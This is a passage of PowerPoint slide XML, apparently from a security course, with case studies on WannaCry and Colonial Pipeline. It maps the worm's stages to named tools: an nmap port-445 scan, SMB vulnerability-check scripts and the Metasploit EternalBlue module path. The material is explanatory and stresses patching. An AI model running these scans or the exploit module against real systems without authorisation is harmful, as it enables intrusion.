            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8412480" y="4334256"/>
            <a:ext cx="3017520" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="701DF5"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>143k</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Text 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8412480" y="4983480"/>
            <a:ext cx="3063240" cy="548640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>US dollars collected in ransom, against damages in the billions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Text 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="5897880"/>
            <a:ext cx="11064240" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>The patch had been available for two months. That is the whole story, and it is why enumeration reports get written.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="135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07 / CASE STUDY 1</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You already know every step it used</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55</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1463040"/>
            <a:ext cx="11091672" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="120A22"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="777240" y="1627632"/>
            <a:ext cx="1645920" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Scanning</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2514600" y="1591056"/>
            <a:ext cx="5120640" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>The worm scanned the local subnet and random internet ranges for TCP 445</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7818120" y="1591056"/>
            <a:ext cx="3657600" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1500"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>nmap -p445 across a /24 asks the same question</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="777240" y="2569464"/>
            <a:ext cx="1645920" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2514600" y="2532888"/>
            <a:ext cx="5120640" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>It checked whether the host spoke SMBv1 and whether MS17-010 was applied</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7818120" y="2532888"/>
            <a:ext cx="3657600" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1500"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>smb-os-discovery and smb-vuln-ms17-010 do the same thing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Shape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="3346704"/>
            <a:ext cx="11091672" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="120A22"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="777240" y="3511296"/>
            <a:ext cx="1645920" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2514600" y="3474720"/>
            <a:ext cx="5120640" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>EternalBlue, CVE-2017-0144, remote code execution with no credentials</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7818120" y="3474720"/>
            <a:ext cx="3657600" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1500"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>exploit/windows/smb/ms17_010_eternalblue in Metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="777240" y="4453128"/>
            <a:ext cx="1645920" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Payload</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2514600" y="4416552"/>
            <a:ext cx="5120640" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>DoublePulsar loaded the ransomware into memory on the target</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7818120" y="4416552"/>
            <a:ext cx="3657600" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1500"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>A staged payload, delivered in two steps</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Shape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="5230368"/>
            <a:ext cx="11091672" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="120A22"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="777240" y="5394960"/>
            <a:ext cx="1645920" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Propagation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2514600" y="5358384"/>
            <a:ext cx="5120640" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Every new victim became a scanner and repeated the loop</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7818120" y="5358384"/>
            <a:ext cx="3657600" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1500"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>The same six phases, automated and running worldwide</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Shape 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="6263640"/>
            <a:ext cx="11091672" cy="502920"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12727"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1B1033"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="6364224"/>
            <a:ext cx="10515600" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Every step in that chain is an ordinary technique. What made it historic was the scale, and the fact that nobody asked permission.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="135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07 / CASE STUDY 2</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Colonial Pipeline, May 2021</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56</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="1463040"/>
            <a:ext cx="11064240" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2170"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1550" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>No exploit. No zero day. One password for an account nobody was using any more.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="2487168"/>
            <a:ext cx="9555480" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1261872" y="2423160"/>
            <a:ext cx="128016" cy="128016"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="701DF5"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="0B0711"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="320040" y="2084832"/>
            <a:ext cx="2011680" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
